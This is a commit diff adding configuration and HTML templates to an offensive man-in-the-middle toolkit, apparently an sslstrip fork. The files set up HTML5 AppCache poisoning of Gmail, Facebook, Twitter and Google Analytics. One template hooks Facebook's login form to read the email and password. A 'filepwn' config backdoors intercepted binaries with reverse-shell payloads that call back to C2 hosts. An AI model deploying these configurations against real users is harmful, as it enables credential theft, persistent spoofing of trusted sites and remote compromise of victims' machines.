AppCachePoison is now a plugin and cleaned dir tree

config_files/app_cache_poison.cfg

@@ -0,0 +1,57 @@
+[DEFAULT]
+; HTML5 AppCache poisioning attack
+; see http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html for description of the attack.
+; generic settings for tampering engine
+
+enabled=True
+tamper_class=libs.AppCachePoisonClass
+;all settings below are specific for AppCachePoison
+
+templates_path=config_files/app_cache_poison_templates
+;enable_only_in_useragents=Chrome|Firefox
+
+; when visiting first url matching following expression we will embed iframes with all tamper URLs
+;(to poison the cache for all of them all at once)
+mass_poison_url_match=http://.*prezydent\.pl.*
+; it's only useful to mass poison chrome because:
+; - it supports iframe sandbox preventing framebusting
+; - does not ask for confirmation
+mass_poison_useragent_match=Chrome|Safari
+
+[test]
+; any //example.com URL redirects to iana and will display our spoofed content
+tamper_url=http://example.com/
+manifest_url=http://www.iana.org/robots.txt ;use existing static URL that is rarely seen by the browser user, but exists on the server (no 404!)
+templates=test ; which templates to use for spoofing content?
+skip_in_mass_poison=1
+
+; use absolute URLs - system tracks 30x redirects, so you can put any URL that belongs to the redirection loop here
+[gmail]
+tamper_url=http://mail.google.com/mail/
+; manifest has to be of last domain in redirect loop
+manifest_url=http://mail.google.com/robots.txt
+templates=default ; could be omitted
+
+[facebook]
+tamper_url=http://www.facebook.com/
+manifest_url=http://www.facebook.com/robots.txt
+templates=facebook ; use different template
+
+[twitter]
+tamper_url=http://twitter.com/
+;tamper_url_match=^http://(www\.)?twitter\.com/$
+manifest_url=http://twitter.com/robots.txt
+
+[testing]
+tamper_url=http://www.html5rocks.com/en/
+manifest_url=http://www.html5rocks.com/robots.txt
+
+; we can also modify non-HTML URLs to append malicious code to them
+; but for them to be cached in HTML5 AppCache they need to be referred in
+; manifest for a poisoned domain
+; if not, they are "only" cached for 10 years :D
+[ga]
+raw_url=http://www.google-analytics.com/ga.js
+templates=script
+skip_in_mass_poison=1
+;you can add other scripts in additional sections like jQuery etc.

config_files/app_cache_poison_templates/default.append

@@ -0,0 +1,38 @@
+<style type="text/css" media="screen">
+  .aribbon {
+    background-color: #a00;
+    overflow: hidden;
+    z-index: 1000;
+    /* top left corner */
+    position: absolute;
+    left: -3em;
+    top: 2.5em;
+    /* 45 deg ccw rotation */
+    -moz-transform: rotate(-45deg);
+    -webkit-transform: rotate(-45deg);
+    /* shadow */
+    -moz-box-shadow: 0 0 1em #888;
+    -webkit-box-shadow: 0 0 1em #888;
+  }
+  .aribbon a {
+    border: 1px solid #faa;
+    color: #fff;
+    display: block;
+    font: bold 81.25% 'Helvetiva Neue', Helvetica, Arial, sans-serif;
+    margin: 0.05em 0 0.075em 0;
+    padding: 0.5em 3.5em;
+    text-align: center;
+    text-decoration: none;
+    /* shadow */
+    text-shadow: 0 0 0.5em #444;
+  }
+</style>
+<div class="aribbon">
+<a href="https://github.com/koto/sslstrip">
+  AppCache poisoned
+</a>
+</div>
+<div style="padding: 1em;border:1px solid red;margin:1em">
+<h1>AppCache Poison works!</h1>
+<p><code>%%tamper_url%%</code> page is spoofed with <a href="https://github.com/koto/sslstrip">AppCache Poison</a> by <a href="http://blog.kotowicz.net">Krzysztof Kotowicz</a>, but this is just a default content. To replace it, create appropriate files in your templates directory and add your content there.</p>
+</div>

config_files/app_cache_poison_templates/default.manifest

@@ -0,0 +1,8 @@
+CACHE MANIFEST
+CACHE:
+%%tamper_url%%
+http://www.google-analytics.com/ga.js
+NETWORK:
+*
+http://*
+https://**

config_files/app_cache_poison_templates/facebook.append

@@ -0,0 +1,46 @@
+<style type="text/css" media="screen">
+  .aribbon {
+    background-color: #a00;
+    overflow: hidden;
+    z-index: 1000;
+    /* top left corner */
+    position: absolute;
+    left: -3em;
+    top: 2.5em;
+    /* 45 deg ccw rotation */
+    -moz-transform: rotate(-45deg);
+    -webkit-transform: rotate(-45deg);
+    /* shadow */
+    -moz-box-shadow: 0 0 1em #888;
+    -webkit-box-shadow: 0 0 1em #888;
+  }
+  .aribbon a {
+    border: 1px solid #faa;
+    color: #fff;
+    display: block;
+    font: bold 81.25% 'Helvetiva Neue', Helvetica, Arial, sans-serif;
+    margin: 0.05em 0 0.075em 0;
+    padding: 0.5em 3.5em;
+    text-align: center;
+    text-decoration: none;
+    /* shadow */
+    text-shadow: 0 0 0.5em #444;
+  }
+</style>
+<div class="aribbon">
+<a href="https://github.com/koto/sslstrip">
+  AppCache poisoned
+</a>
+</div>
+<div style="padding: 1em;border:1px solid red;margin:1em">
+<h1>We work on Facebook too!</h1>
+<p><code>%%tamper_url%%</code> page is spoofed with <a href="https://github.com/koto/sslstrip">AppCache Poison</a> by <a href="http://blog.kotowicz.net">Krzysztof Kotowicz</a>, but this is just a default content. To replace it, create <code>facebook.append</code> or <code>facebook.replace</code> file and add your content there.</p>
+</div>
+<script>
+var f = document.getElementById('login_form').onsubmit;
+document.getElementById('login_form').onsubmit = function() {
+    alert("Hello, " + document.getElementById('email').value + ' ' + document.getElementById('pass').value);
+    return Event.__inlineSubmit(this,event);
+}
+</script>
+

config_files/app_cache_poison_templates/facebook.manifest

@@ -0,0 +1,7 @@
+CACHE MANIFEST
+CACHE:
+%%tamper_url%%
+NETWORK:
+*
+http://*
+https://**

config_files/app_cache_poison_templates/script.append

@@ -0,0 +1,2 @@
+
+;console.log('AppCache Poison was here. Google Analytics FTW');

config_files/app_cache_poison_templates/test.replace

@@ -0,0 +1,49 @@
+<html>
+<style type="text/css" media="screen">
+  .aribbon {
+    background-color: #a00;
+    overflow: hidden;
+    z-index: 1000;
+    /* top left corner */
+    position: absolute;
+    left: -3em;
+    top: 2.5em;
+    /* 45 deg ccw rotation */
+    -moz-transform: rotate(-45deg);
+    -webkit-transform: rotate(-45deg);
+    /* shadow */
+    -moz-box-shadow: 0 0 1em #888;
+    -webkit-box-shadow: 0 0 1em #888;
+  }
+  .aribbon a {
+    border: 1px solid #faa;
+    color: #fff;
+    display: block;
+    font: bold 81.25% 'Helvetiva Neue', Helvetica, Arial, sans-serif;
+    margin: 0.05em 0 0.075em 0;
+    padding: 0.5em 3.5em;
+    text-align: center;
+    text-decoration: none;
+    /* shadow */
+    text-shadow: 0 0 0.5em #444;
+  }
+  
+  body { padding-left: 20em}
+</style>
+<div class="aribbon">
+<a href="https://github.com/koto/sslstrip">
+  AppCache poisoned
+</a>
+</div>
+<h1>Hurray!</h1>
+<p>AppCache Poison by <a href="http://blog.kotowicz.net">Krzysztof Kotowicz</a></p>
+
+<p>If you're seeing this, <a href="http://github.com/koto/sslstrip">AppCache Poison</a> works correctly. Try going to <a href="http://facebook.com">http://facebook.com</a> to see it in action.</p>
+<script>
+if(!window.applicationCache) {
+    document.write('<strong>Your browser does not support HTML5 AppCache though, cache poisoning won\'t work:(</strong>');
+}
+<!-- and poison ga -->
+<img src="http://www.google-analytics.com/ga.js" />
+</script>
+</html>

config_files/filepwn.cfg

@@ -0,0 +1,56 @@
+[ZIP]
+# patchCount is the max number of files to patch in a zip file
+# After the max is reached it will bypass the rest of the files 
+# and send on it's way
+
+patchCount = 5
+
+# In Bytes
+maxSize = 40000000
+
+blacklist = .dll,  #don't do dlls in a zip file
+
+[targets]
+	#MAKE SURE that your settings for host and port DO NOT
+	# overlap between different types of payloads
+	
+	[[ALL]] # DEFAULT settings for all targets REQUIRED
+	
+	LinuxType = ALL 	# choices: x86/x64/ALL/None
+	WindowsType = ALL 	# choices: x86/x64/ALL/None
+	
+	FileSizeMax = 50000000  # ~50 MB (just under) No patching of files this large
+
+		[[[LinuxIntelx86]]]
+		SHELL = reverse_shell_tcp   # This is the BDF syntax
+		HOST = 192.168.1.168 		# The C2
+		PORT = 8888
+		SUPPLIED_SHELLCODE = None
+		MSFPAYLOAD = linux/x86/shell_reverse_tcp	# MSF syntax
+		
+		[[[LinuxIntelx64]]]
+		SHELL = reverse_shell_tcp
+		HOST = 192.168.10.4
+		PORT = 6666
+		SUPPLIED_SHELLCODE = None
+		MSFPAYLOAD = linux/x64/shell_reverse_tcp
+
+		[[[WindowsIntelx86]]]
+		PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
+		HOST = 192.168.10.4
+		PORT = 6666
+		SHELL = iat_reverse_tcp
+		SUPPLIED_SHELLCODE = None
+		ZERO_CERT = False
+		PATCH_DLL = True
+		MSFPAYLOAD = windows/shell_reverse_tcp
+
+		[[[WindowsIntelx64]]]
+		PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
+		HOST = 192.168.1.16
+		PORT = 8088
+		SHELL = reverse_shell_tcp
+		SUPPLIED_SHELLCODE = None
+		ZERO_CERT = True
+		PATCH_DLL = False
+		MSFPAYLOAD = windows/x64/shell_reverse_tcp